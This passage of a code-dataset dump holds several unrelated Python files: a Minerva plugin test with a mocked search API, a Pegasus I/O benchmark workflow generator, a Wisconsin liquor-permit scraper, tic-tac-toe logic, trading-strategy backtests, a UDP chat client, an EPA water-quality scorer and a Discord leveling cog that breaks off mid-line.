analysis['_id']\n }\n }\n self.assertEquals(analysis['meta'], expected_meta, 'Unexpected value for meta data')\n\n # create the dataset folder\n path = '/minerva_dataset/folder'\n params = {\n 'userId': self._user['_id'],\n }\n response = self.request(path=path, method='POST', params=params, user=self._user)\n self.assertStatusOk(response)\n\n # mock the calls to bsve search\n @urlmatch(netloc=r'(.*\\.)?beta-search.bsvecosystem.net(.*)$')\n def bsve_mock(url, request):\n if url.path.split('/')[-1] == 'request':\n return httmock.response(200, '12345')\n else:\n pluginTestDir = os.path.dirname(os.path.realpath(__file__))\n filepath = os.path.join(pluginTestDir, 'data', 'bsve_search.json')\n with open(filepath) as bsve_search_file:\n content = {\n 'status': 1,\n 'results': json.load(bsve_search_file)\n }\n headers = {\n 'content-length': len(content),\n 'content-type': 'application/json'\n }\n return httmock.response(200, content, headers, request=request)\n\n with HTTMock(bsve_mock):\n response = self.request(\n path='/minerva_analysis/bsve_search',\n method='POST',\n params={\n 'datasetName': 'test dataset',\n 'bsveSearchParams': '{}'\n },\n user=self._user\n )\n\n # wait for the async job to complete\n searchResultsFinished = False\n count = 0\n while not searchResultsFinished and count < 5:\n # get the dataset and check if it has been updated\n path = '/minerva_dataset/%s/dataset' % str(response.json['dataset_id'])\n response = self.request(\n path=path,\n method='GET',\n user=self._user\n )\n dataset = response.json\n if 'json_row' in dataset:\n searchResultsFinished = True\n else:\n time.sleep(2)\n count += 1\n\n # ensure the first row of results was added to the dataset\n self.assertTrue('json_row' in dataset, 'json_row expected in dataset')\n self.assertTrue('data' in dataset['json_row'], 'data should be in json_row')\n self.assertTrue('Longitude' in dataset['json_row']['data'], 'data.Longitude should be in json_row')\n\n # ensure that we can map the Lat/Long to geojson, as this json has\n # unicode values for Lat/Long\n\n # update the minerva metadata with coordinate mapping\n metadata = {'minerva': dataset}\n metadata['minerva']['mapper'] = {\n \"latitudeKeypath\": \"data.Latitude\",\n \"longitudeKeypath\": \"data.Longitude\"\n }\n\n path = '/item/{}/metadata'.format(dataset['dataset_id'])\n response = self.request(\n path=path,\n method='PUT',\n user=self._user,\n body=json.dumps(metadata),\n type='application/json'\n )\n metadata = response.json\n\n # create geojson in the dataset\n path = '/minerva_dataset/{}/geojson'.format(dataset['dataset_id'])\n response = self.request(\n path=path,\n method='POST',\n user=self._user,\n )\n self.assertHasKeys(response.json, ['geojson_file'])\n","sub_path":"plugin_tests/analysis_test.py","file_name":"analysis_test.py","file_ext":"py","file_size_in_byte":8034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"164505475","text":"#!/usr/bin/python2\n\nfrom DAX3 import *\n\nt = \"write1\"\n\nname1 = \"iotester_{}_{}M\".format(t, 1)\nname10 = \"iotester_{}_{}M\".format(t, 10)\nname100 = \"iotester_{}_{}M\".format(t, 100)\n\npname1 = \"iotester_{}p_{}M\".format(t, 1)\npname10 = \"iotester_{}p_{}M\".format(t, 10)\npname100 = \"iotester_{}p_{}M\".format(t, 100)\n\ndag1 = ADAG(name1)\ndag10 = ADAG(name10)\ndag100 = ADAG(name100)\n\npdag1 = ADAG(pname1)\npdag10 = ADAG(pname10)\npdag100 = ADAG(pname100)\n\nclear1 = ADAG(\"clear_write1_1M\")\nclear10 = ADAG(\"clear_write1_10M\")\nclear100 = 
ADAG(\"clear_write1_100M\")\n\ntouch1 = ADAG(\"touch_write1_1M\")\ntouch10 = ADAG(\"touch_write1_10M\")\ntouch100 = ADAG(\"touch_write1_100M\")\n\n\nfor i in range(1, 16384 + 1):\n\n if i <= 2048:\n j = Job(id=\"ID{:08d}\".format(i), name=\"iotester\")\n j.addArguments(\"append {}_{} {}\".format(name100, i, 100))\n dag100.addJob(j)\n pdag100.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"rm\")\n j.addArguments(\"{}_{}\".format(name100, i))\n clear100.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"touch\")\n j.addArguments(\"{}_{}\".format(name100, i))\n touch100.addJob(j)\n\n if i <= 8192:\n j = Job(id=\"ID{:08d}\".format(i), name=\"iotester\")\n j.addArguments(\"append {}_{} {}\".format(name10, i, 10))\n dag10.addJob(j)\n pdag10.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"rm\")\n j.addArguments(\"{}_{}\".format(name10, i))\n clear10.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"touch\")\n j.addArguments(\"{}_{}\".format(name10, i))\n touch10.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"iotester\")\n j.addArguments(\"append {}_{} {}\".format(name1, i, 1))\n dag1.addJob(j)\n pdag1.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"rm\")\n j.addArguments(\"{}_{}\".format(name1, i))\n clear1.addJob(j)\n\n j = Job(id=\"ID{:08d}\".format(i), name=\"touch\")\n j.addArguments(\"{}_{}\".format(name1, i))\n touch1.addJob(j)\n\n\nf = open(\"/home/rdevries/workflows/{}.dax\".format(name1),\"w\")\ndag1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(name10),\"w\")\ndag10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(name100),\"w\")\ndag100.writeXML(f)\nf.close()\n\nf = open(\"/home/rdevries/workflows/{}.dax\".format(pname1),\"w\")\npdag1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(pname10),\"w\")\npdag10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/{}.dax\".format(pname100),\"w\")\npdag100.writeXML(f)\nf.close()\n\nf = open(\"/home/rdevries/workflows/clear_write1_1M.dax\",\"w\")\nclear1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/clear_write1_10M.dax\",\"w\")\nclear10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/clear_write1_100M.dax\",\"w\")\nclear100.writeXML(f)\nf.close()\n\nf = open(\"/home/rdevries/workflows/touch_write1_1M.dax\",\"w\")\ntouch1.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/touch_write1_10M.dax\",\"w\")\ntouch10.writeXML(f)\nf.close()\nf = open(\"/home/rdevries/workflows/touch_write1_100M.dax\",\"w\")\ntouch100.writeXML(f)\nf.close()\n# f = open(\"/home/rdevries/workflows/prepare_{}.dax\".format(t),\"w\")\n# prepare_dag.writeXML(f)\n# f.close()\n","sub_path":"iotester_write1.py","file_name":"iotester_write1.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"78240955","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 2019-Jun-20 11:35:42\nTICKET NUMBER -AI_296\n@author: muhil\n'''\n\nfrom Data_scuff.extensions.feeds import ExcelFeedSpider\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import MapCompose\nfrom w3lib.html import remove_tags, replace_escape_chars\nimport scrapy\nfrom Data_scuff.spiders.AI_296.items import WiLiquorLicensesSpiderItem\nfrom Data_scuff.spiders.__common import CustomSettings\nfrom Data_scuff.utils.utils import Utils\nfrom Data_scuff.spiders.__common import DataFormatterMixin,LookupDatareaderMixin\n\n\nclass 
WiLiquorLicensesSpider(ExcelFeedSpider,DataFormatterMixin,LookupDatareaderMixin):\n name = '296_wi_liquor_licenses'\n allowed_domains = ['wi.gov']\n start_urls = ['https://www.revenue.wi.gov/DORReports/prmitlst.xlsx']\n skiprows=1\n custom_settings = {\n 'FILE_NAME':Utils.getRundateFileName('WiLiquorLicensesSpider'),\n 'JIRA_ID':'AI_296',\n 'DOWNLOAD_DELAY':5,\n 'COOKIES_ENABLED':True,\n 'COOKIES_DEBUG':True,\n 'HTTPCACHE_ENABLED':False,\n # 'JOBDIR' : CustomSettings.getJobDirectory('wi_liquor_licenses'),\n 'TOP_HEADER':{ 'company_name': 'Business Name',\n 'dba_name': '',\n 'location_address_string': 'Business Address+City+State+Zip',\n 'mixed_name': 'Name',\n 'permit_lic_desc': '',\n 'permit_lic_eff_date': 'Commence/ Beginning Effective Date',\n 'permit_lic_exp_date': 'BTR Expiration Date',\n 'permit_subtype': 'Permit Type/ Account Sub-Type',\n 'permit_type': '',\n 'person_phone': 'Phone',\n 'peson_name': 'Contact',\n 'square_footage': 'Sq Footage'},\n 'FIELDS_TO_EXPORT':[ 'peson_name',\n 'person_phone',\n 'mixed_name',\n 'permit_lic_desc',\n 'sourceName',\n 'url',\n 'permit_type',\n 'square_footage',\n 'ingestion_timestamp',\n 'dba_name',\n 'location_address_string',\n 'permit_lic_eff_date',\n 'permit_subtype',\n 'company_name',\n 'permit_lic_exp_date'],\n 'NULL_HEADERS':[]\n }\n\n # Do any adaptations you need here\n #def adapt_response(self, response):\n # return response\n \n def parse(self, response):\n url=['https://www.revenue.wi.gov/DORReports/prmitlst.xlsx','https://www.revenue.wi.gov/DORReports/beer-permit-list.xlsx']\n for link in url:\n yield scrapy.Request(link, callback= self.parse_excel, dont_filter=True,encoding='utf-8')\n\n def parse_row(self, response, row):\n print(row)\n il = ItemLoader(item=WiLiquorLicensesSpiderItem())\n # il.default_input_processor = MapCompose(lambda v: v.strip(), remove_tags, replace_escape_chars)\n\t\t# il.add_value('ingestion_timestamp', Utils.getingestion_timestamp())\n il.add_value('sourceName', 'WI_Liquor_Licenses')\n il.add_value('url', 'https://www.revenue.wi.gov/DORReports/prmitlst.xlsx')\n il.add_value('peson_name', row.get('Contact','') if row.get('Contact','') else '')\n il.add_value('person_phone', row['Phone'])\n il.add_value('mixed_name', row['Name'])\n il.add_value('permit_lic_desc', row[''])\n il.add_value('permit_type', row[''])\n il.add_value('square_footage', row['Sq Footage'])\n il.add_value('dba_name', row[''])\n il.add_value('location_address_string', row['Business Address+City+State+Zip'])\n il.add_value('permit_lic_eff_date', row['Commence/ Beginning Effective Date'])\n il.add_value('permit_subtype',row.get('Permit Type','') if row.get('Permit Type','') else '')\n il.add_value('company_name', row['Business Name'])\n il.add_value('permit_lic_exp_date', row['BTR Expiration Date'])\n return il.load_item()","sub_path":"all_spider/AI_296/wi_liquor_licenses.py","file_name":"wi_liquor_licenses.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"126120204","text":"\nimport random\nimport numpy as np\n\n\n# randomly returns a string with the starting player: 'user' or 'pc'\ndef starting_one():\n players = ['user', 'pc']\n return players[random.randrange(0, 2)]\n\n\n# returns true if the given coordinates match with an empty space in the playground\ndef empty_cell(plg, x, y):\n return plg[x][y] == 0\n\n\n# updates the variable plg filling the position (x,y) with or 1 or -1\ndef update_plg(plg, bi, x, y):\n plg[x][y] = bi\n return 
plg\n\n\n# returns the name of the winner or an empty string if there is still no winner in the game\ndef who_wins(plg):\n winner = ''\n plg_a = np.array(plg)\n\n if np.trace(plg_a) == 3 or np.trace(np.fliplr(plg_a)) == 3: # checking the diagonals\n winner = 'user'\n elif np.trace(plg_a) == -3 or np.trace(np.fliplr(plg_a)) == -3:\n winner = 'pc'\n else:\n for i in range(3): # before 'or': check X axis, after check Y axis) x3 (rows/columns)\n if plg_a.sum(axis=1)[i] == 3 or plg_a.sum(axis=0)[i] == 3:\n winner = 'user'\n break\n elif plg_a.sum(axis=1)[i] == -3 or plg_a.sum(axis=0)[i] == -3:\n winner = 'pc'\n break\n else:\n winner = ''\n\n return winner\n\n\n# asks the user for the x,y coordinates of his/her move, checks if x,y are inside the playground and return them.\ndef user_move():\n options = ['1', '2', '3']\n choosen_x = ''\n choosen_y = ''\n while choosen_x not in options:\n # check if its an integer\n choosen_x = input(\"Indicate de X coordinate of your move (1,2,3)\")\n while choosen_y not in options:\n # check if its an integer\n choosen_y = input(\"Indicate de Y coordinate of your move (1,2,3)\")\n\n return int(choosen_x) - 1, int(choosen_y) - 1\n\n\n# This function does the pc strategic move (included the check for empty cells)\ndef pc_move(plg):\n global found\n\n # attaking ->> looking for alignment of two '-1' and putting the third\n found = False\n plg_a = np.array(plg)\n\n if np.trace(plg_a) == -2: # checking oportunity in diagonal\n found = True\n if plg[0][0] == 0:\n return 0, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 2, 2\n elif np.trace(np.fliplr(plg_a)) == -2: # checking oportunity in other diagonal\n found = True\n if plg[2][0] == 0:\n return 2, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 0, 2\n else:\n for i in range(3):\n if plg_a.sum(axis=1)[i] == -2: # checking opportunity in horitzontal (x3 rows)\n found = True\n if plg[i][0] == 0:\n return i, 0\n break\n elif plg[i][1] == 0:\n return i, 1\n break\n else:\n return i, 2\n break\n elif plg_a.sum(axis=0)[i] == -2: # checking opportunity in vertical (x3 columns)\n found = True\n if plg[0][i] == 0:\n return 0, i\n break\n elif plg[1][i] == 0:\n return 1, i\n break\n else:\n return 2, i\n break\n\n # defending ->> looking for alignment of two '1' and blocking the third\n if np.trace(plg_a) == 2: # checking oportunity in diagonal\n found = True\n if plg[0][0] == 0:\n return 0, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 2, 2\n elif np.trace(np.fliplr(plg_a)) == 2: # checking oportunity in other diagonal\n found = True\n if plg[2][0] == 0:\n return 2, 0\n elif plg[1][1] == 0:\n return 1, 1\n else:\n return 0, 2\n else:\n for i in range(3):\n if plg_a.sum(axis=1)[i] == 2: # checking opportunity in horitzontal (x3 rows)\n found = True\n if plg[i][0] == 0:\n return i, 0\n break\n elif plg[i][1] == 0:\n return i, 1\n break\n else:\n return i, 2\n break\n elif plg_a.sum(axis=0)[i] == 2: # checking opportunity in vertical (x3 columns)\n found = True\n if plg[0][i] == 0:\n return 0, i\n break\n elif plg[1][i] == 0:\n return 1, i\n break\n else:\n return 2, i\n break\n\n # There's no opportunity to win or block: RANDOM GAME\n if not found:\n pc_x = random.randrange(0, 3)\n pc_y = random.randrange(0, 3)\n while not empty_cell(plg, pc_x, pc_y):\n pc_x = random.randrange(0, 3)\n pc_y = random.randrange(0, 3)\n return pc_x, 
pc_y\n\n","sub_path":"Project_1_Recoding/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"243215439","text":"from . import indicators, toolFuncs\n\n\n# =============================================================================\n# Previous way to construct strategy\n# def Strategy_AIP(data, K):\n# # automatic investment plan\n# l = len(data['Close'])\n# trade_signal = []\n# single = 10000/(l//K+(l%K>0))\n# \n# n = 1\n# for i in range(l):\n# if i % K == 0:\n# trade_signal.append((single, 'value','vary'))\n# n += 1\n# else:\n# trade_signal.append(None) \n# \n# stock_shares, asset = toolFuncs.backtest(data, trade_signal)\n# output = {} \n# output['asset'] = {'name': 'return', 'data': asset, 'position': 'bottom1',\n# 'type': 'line'}\n# #toolFuncs.MaximumDrawdown(asset) \n# output['stock_shares'] = {'name': 'position', 'data': stock_shares, 'position': 'bottom2', 'type': 'bar'}\n# return output\n# =============================================================================\n\ndef Strategy_SIP(data, K):\n '''\n Systematic Investment Plan\n Invest a certain amount of money every K units of time\n About 10000 cash(initial number) will be invested at the end\n '''\n l = len(data['Close'])\n single = 10000/(l//K+(l%K>0))\n infoDic1 = {'close': data['Close'], 'single': single}\n @toolFuncs.OrderTypeEntry \n def Entry(infoDic, asset, orders, i):\n if i == 0:\n return {'amount': infoDic['single'],\n 'amount_type': 'value', 'change_type': 'set',\n 'order_price': infoDic['close'][i]} \n \n infoDic2 = {'close': data['Close'], 'single': single, 'K': K}\n @toolFuncs.OrderTypeSize\n def Size(infoDic, asset, orders, i):\n if i != 0 and i % infoDic['K'] == 0:\n return {'amount': infoDic['single'],\n 'amount_type': 'value', 'change_type': 'vary',\n 'order_price': infoDic['close'][i]} \n \n infoDic_EndExit = {'L': len(data['Close']) - 1, 'close': data['Close']} \n @toolFuncs.OrderTypeExit\n def EndExit(infoDic, asset, orders, i):\n if i == infoDic['L']:\n return {'amount': 0,\n 'amount_type': 'value', 'change_type': 'set',\n 'order_price': infoDic['close'][i]}\n functions = [(Entry, infoDic1), (Size, infoDic2), (EndExit, infoDic_EndExit)]\n\n return toolFuncs.GetOutput(data, functions)\n\n\ndef Strategy_Turtles(data):\n '''\n A trading system taught by Richard Dennis\n N: exponential average of true range, measures volatility, used to determine trading unit, level of stop price, etc.\n Richard Donchian's Channel breakout system is used here\n Entry when 20 days breakout happens(system1)\n Entry system1 is ignored when last trade exits with profit\n Entry when 55 days breakout happens(system2)\n Stop loss at 2N below the latest entry price\n Exit when the opposite 10 days breakout happens(system1)\n Exit when the opposite 20 days breakout happens(system2)\n Add unit at 1/2 N price following the entry\n Position size is controlled by N\n '''\n # calculate N\n N = [None]\n N.extend(toolFuncs.EMA(indicators.TrueRange(data)['tr']['data'][1:], 39))\n # entry system1\n PrecedingHighs20 = indicators.PrecedingHighLow(data, 20)['high']['data']\n PrecedingLows20 = indicators.PrecedingHighLow(data, 20)['low']['data'] \n # entry system2\n PrecedingHighs55 = indicators.PrecedingHighLow(data, 55)['high']['data']\n PrecedingLows55 = indicators.PrecedingHighLow(data, 55)['low']['data'] \n # infoDic: calculated results from data\n\n infoDic2 = {'PrecedingHighs55': PrecedingHighs55, 
'PrecedingLows55': PrecedingLows55,\n 'N': N, 'high': data['High'], 'low': data['Low'], 'open': data['Open']} \n @toolFuncs.OrderTypeEntry \n def entry_func2(infoDic, asset, orders, i):\n # entry condition\n if infoDic['N'][i]: \n # entry system2\n if infoDic['PrecedingHighs55'][i] and infoDic['high'][i] > infoDic['PrecedingHighs55'][i]:\n return {'amount': asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': max(infoDic['PrecedingHighs55'][i], infoDic['open'][i])} \n if infoDic['PrecedingLows55'][i] and infoDic['low'][i] < infoDic['PrecedingLows55'][i]:\n return {'amount': -asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': min(infoDic['PrecedingLows55'][i], infoDic['open'][i])} \n return None\n \n infoDic1 = {'PrecedingHighs20': PrecedingHighs20, 'PrecedingLows20': PrecedingLows20,\n 'N': N, 'high': data['High'], 'low': data['Low'], 'open': data['Open']}\n @toolFuncs.OrderTypeEntry \n def entry_func1(infoDic, asset, orders, i):\n # entry condition\n if infoDic['N'][i] and (not orders or orders[-1]['event_type'] == 'stop_func'):\n # entry system1 condition: previous winner trade (with 'exit' other than 'stop')\n # will make it ignored\n if infoDic['PrecedingHighs20'][i] and infoDic['PrecedingHighs20'][i] < infoDic['high'][i]:\n return {'amount': asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': max(infoDic['PrecedingHighs20'][i], infoDic['open'][i])}\n elif infoDic['PrecedingLows20'][i] and infoDic['PrecedingLows20'][i] > infoDic['low'][i]:\n return {'amount': -asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'set',\n 'order_price': min(infoDic['PrecedingLows20'][i], infoDic['open'][i])}\n\n infoDic3 = {'N': N, 'open': data['Open'], 'low': data['Low'], 'high': data['High']}\n @toolFuncs.OrderTypeExit\n def stop_func(infoDic, asset, orders, i):\n if infoDic['N'][i]:\n position_direction = (asset['position'] > 0) * 2 - 1 # long: 1, short: -1\n target_price = orders[-1]['order_price'] - position_direction * 2 * infoDic['N'][i]\n if position_direction > 0 and infoDic['low'][i] < target_price:\n return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': min(target_price, infoDic['open'][i])}\n elif position_direction < 0 and infoDic['high'][i] > target_price:\n return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': max(target_price, infoDic['open'][i])}\n return None\n \n PrecedingHighs10 = indicators.PrecedingHighLow(data, 10)['high']['data']\n PrecedingLows10 = indicators.PrecedingHighLow(data, 10)['low']['data'] \n infoDic4 = {'PrecedingHighs20': PrecedingHighs20, 'PrecedingLows20': PrecedingLows20,\n 'PrecedingHighs10': PrecedingHighs10, 'PrecedingLows10': PrecedingLows10,\n 'high': data['High'], 'low': data['Low'], 'open': data['Open']} \n @toolFuncs.OrderTypeExit\n def exit_func(infoDic, asset, orders, i):\n j = 1\n while orders[-j]['event_type'] not in {'entry_func1', 'entry_func2'}:\n j += 1\n trade_entry_type = orders[-j]['event_type'] \n if asset['position'] > 0:\n if trade_entry_type == 'entry_func1' and infoDic['PrecedingLows10'][i] and infoDic['PrecedingLows10'][i]>infoDic['low'][i]:\n return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': min(infoDic['PrecedingLows10'][i], infoDic['open'][i])} \n if trade_entry_type == 'entry_func2' and infoDic['PrecedingLows20'][i] and infoDic['PrecedingLows20'][i]>infoDic['low'][i]:\n 
return {'amount': 0, 'amount_type': 'stock',\n 'change_type': 'set', 'order_price': min(infoDic['PrecedingLows20'][i], infoDic['open'][i])}\n if asset['position'] < 0: \n if trade_entry_type == 'entry_func1' and infoDic['PrecedingHighs10'][i] and infoDic['PrecedingHighs10'][i] 0) * 2 - 1 # long: 1, short: -1\n target_price = orders[-1]['order_price'] + position_direction * 0.5 * infoDic['N'][i]\n \n if position_direction > 0 and infoDic['high'][i] > target_price:\n return {'amount': asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'vary',\n 'order_price': max(target_price, infoDic['open'][i])} \n elif position_direction < 0 and infoDic['low'][i] < target_price:\n return {'amount': -asset['total']/100/infoDic['N'][i],\n 'amount_type': 'stock', 'change_type': 'vary',\n 'order_price': min(target_price, infoDic['open'][i])} \n return None \n \n infoDic_EndExit = {'L': len(data['Close']) - 1, 'close': data['Close']} \n @toolFuncs.OrderTypeExit\n def EndExit(infoDic, asset, orders, i):\n if i == infoDic['L']:\n return {'amount': 0,\n 'amount_type': 'value', 'change_type': 'set',\n 'order_price': infoDic['close'][i]} \n functions = [(entry_func1, infoDic1), (entry_func2, infoDic2),\n (stop_func, infoDic3), (exit_func, infoDic4),\n (size_func, infoDic5), (EndExit, infoDic_EndExit)]\n \n return toolFuncs.GetOutput(data, functions)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main/methods/strategies.py","file_name":"strategies.py","file_ext":"py","file_size_in_byte":10575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"124446614","text":"import socket\nimport threading\n\n\ndef recv_data(sock):\n while True:\n data = sock.recv(1024)\n print('\\r' + data.decode() + '\\n' + 'You: ', end='')\n\n\n\nhost = '127.0.0.1'\nport = int(input('Input port: '))\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.connect((host, port))\n\nif not port:\n port = 3000\nelse:\n port = int(port)\n\n\nwhile True:\n nick = input('Input sentence nickname: ')\n nickname = '='+nick\n if nick == 'exit':\n sock.close()\n print('Disconnection')\n break\n\n sock.send(nickname.encode())\n data = sock.recv(1024)\n data = data.decode()\n if data == '':\n print(f'Welcome to the chat!, {nick}')\n break\n elif data == '':\n print(f'Change nickname')\n\n\ntread = threading.Thread(target=recv_data, args=(sock,), daemon=True)\ntread.start()\nsock.send('enter'.encode())\n\nwhile True:\n data = input(f'you: ')\n sock.send(data.encode())\n if data == 'exit':\n sock.close()\n print('Disconnection')\n break\n","sub_path":"client_chat.py","file_name":"client_chat.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"201699596","text":"from app import models as app_models\nfrom rawdata import models as rawdata_models\nfrom app import models as app_models\nfrom utils.log import log\n\nclass SDW_Data_Cruncher(object):\n\n\n # major violation for each of the last 12 quarters\n _HISTORICAL_MAX_SCORE = 120.0\n\n # maxium score for a quartor\n _CURRENT_MAX_SCORE = 10.0\n\n _HISTORICAL_SCORE_WEIGHT = 0.4\n _CURRENT_SCORE_WEIGHT = 0.6\n\n _COMMUNITY_WATER_SYSTEM_WEIGHT = 0.6\n _OTHER_WATER_SYSTEM_WEIGHT = 0.4\n\n def __init__(self):\n pass\n\n def _calc_historical_score(self, viopaccr):\n # viopaccr: historical score\n if (viopaccr >= self._HISTORICAL_MAX_SCORE):\n # 1 represents the highest value which equates to the worst water quality in general\n return 
1\n\n return viopaccr / self._HISTORICAL_MAX_SCORE\n\n def _calc_current_score(self, voiremain):\n # voiremain current score\n if (voiremain >= self._CURRENT_MAX_SCORE ):\n return 1\n\n return voiremain / self._CURRENT_MAX_SCORE\n\n def _calc_facility_score(self, viopaccr , voiremain, pop_served):\n historical_score = self._calc_historical_score(viopaccr)\n current_score = self._calc_current_score(voiremain)\n\n return (historical_score * self._HISTORICAL_SCORE_WEIGHT) + (current_score * self._CURRENT_SCORE_WEIGHT)\n\n def _pws_type_score(self, systems):\n # for every facility there is one system\n cws_score = 0\n cws_population = 0\n other_population = 0\n other_score = 0\n for system in systems:\n if (system.PWSTypeCode == 'cws' ):\n cws_population += system.PopulationServedCount\n cws_score += self._calc_facility_score(system.Viopaccr, system.Vioremain, system.PopulationServedCount) * system.PopulationServedCount\n else:\n other_population += system.PopulationServedCount\n other_score += self._calc_facility_score(system.Viopaccr, system.Vioremain, system.PopulationServedCount) * system.PopulationServedCount\n\n\n if cws_population:\n cumulative_cws_score = (cws_score / cws_population) * self._COMMUNITY_WATER_SYSTEM_WEIGHT\n else:\n cumulative_cws_score = 0\n\n if other_population:\n cumlative_other_score = (other_score / other_population) * self._OTHER_WATER_SYSTEM_WEIGHT\n else:\n cumlative_other_score = 0\n\n return ( cumulative_cws_score, cumlative_other_score )\n\n def _calc_area_score(self, county_fips):\n # single area represent a zipcode\n areas = []\n\n systems = rawdata_models.EpaWaterSystem.objects.filter( FIPSCodes__contains = county_fips )\n cws_score, other_score = self._pws_type_score(systems)\n\n return cws_score + other_score\n\n def calc_state_scores(self, state, print_test = False):\n areas = []\n\n if print_test:\n log('state: %s' % (state), 'success')\n\n for location in app_models.location.objects.filter( state = state).exclude(fips_county = ''):\n score = self._calc_area_score(location.fips_county)\n areas.append({\n 'county_fips': location.fips_county,\n 'score': score\n })\n\n if print_test:\n log('%s: %s' % (location.fips_county, round(score, 3)), 'success')\n\n return areas\n","sub_path":"utils/epa/sdw_data_cruncher.py","file_name":"sdw_data_cruncher.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"144487273","text":"import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import CommandNotFound\r\nfrom discord.utils import get\r\nimport asyncio\r\nimport random\r\nimport time\r\nimport os\r\nimport requests\r\nimport json\r\nimport re\r\ndef save(savemap, file):\r\n with open(file, \"w\") as f:\r\n json.dump(savemap, f)\r\ndef load(file):\r\n with open(file) as f:\r\n loadmap = json.load(f)\r\n return loadmap\r\n\r\nclass leveling(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command()\r\n async def levels(self, ctx):\r\n toplist = []\r\n people = load(\"members.json\")\r\n toplist = [[player, stats[\"level\"]*1000+stats[\"xp\"]] for player, stats in people.items()]\r\n toplist = sorted(toplist, key=lambda x: x[1], reverse=True)\r\n top1 = f\"<@{toplist[0][0]}> XP: {str(toplist[0][1])}\"\r\n top2 = f\"<@{toplist[1][0]}> XP: {str(toplist[1][1])}\"\r\n top3 = f\"<@{toplist[2][0]}> XP: {str(toplist[2][1])}\"\r\n top4 = f\"<@{toplist[3][0]}> XP: {str(toplist[3][1])}\"\r\n top5 = f\"<@{toplist[4][0]}> XP: 
{str(toplist[4][1])}\"\r\n embed=discord.Embed(title=\"Leaderboard\", description=f'''The top 5 scoring members!\r\n #1 {top1}\r\n #2 {top2}\r\n #3 {top3}\r\n #4 {top4}\r\n #5 {top5}''')\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command()\r\n @commands.has_permissions(administrator=True)\r\n async def xp(self, ctx, cmd=None, member: discord.Member=None, arg2=None):\r\n if cmd == None:\r\n await ctx.send('''Xp Commands:\r\n xp set set a players xp\r\n xp level set a players level''')\r\n else:\r\n people = load(\"members.json\")\r\n name = str(member.id)\r\n person = people[name]\r\n if cmd == \"set\":\r\n person[\"xp\"] = int(arg2)\r\n await ctx.send(f'''Set {member.mention}'s xp to {arg2}''')\r\n save(people, \"members.json\")\r\n if cmd == \"level\":\r\n person[\"level\"] = int(arg2)\r\n await ctx.send(f'''Set {member.mention}'s level to {arg2}''')\r\n save(people, \"members.json\")\r\n\r\n @commands.command()\r\n async def rank(self, ctx, target: discord.Member = None):\r\n if target == None:\r\n people = load(\"members.json\")\r\n person = people[str(ctx.author.id)]\r\n embed=discord.Embed(title=f\"**Rank For {ctx.author}**\", description=f'''Level: {person[\"level\"]} Xp: {person[\"xp\"]}/1000''', color=0x00e4f5)\r\n await ctx.send(embed=embed)\r\n else:\r\n people = load(\"members.json\")\r\n person = people[str(target.id)]\r\n embed=discord.Embed(title=f\"**Rank For {target}**\", description=f'''Level: {person[\"level\"]} Xp: {person[\"xp\"]}/1000''', color=0x00e4f5)\r\n await ctx.send(embed=embed)\r\n \r\n @commands.Cog.listener()\r\n async def on_message(self, message):\r\n if message.author.bot:\r\n return\r\n name = str(message.author.id)\r\n people = load(\"members.json\")\r\n if name in people:\r\n person = people[name]\r\n person[\"name\"] = message.author.name\r\n person[\"tag\"] = message.author.discriminator\r\n earned = random.randint(1, 25)\r\n person[\"xp\"] = person[\"xp\"]+earned\r\n if message.content.startswith(\"!rank\"):\r\n person[\"xp\"] = person[\"xp\"]-earned\r\n # add a level if they reached levelup xp\r\n if 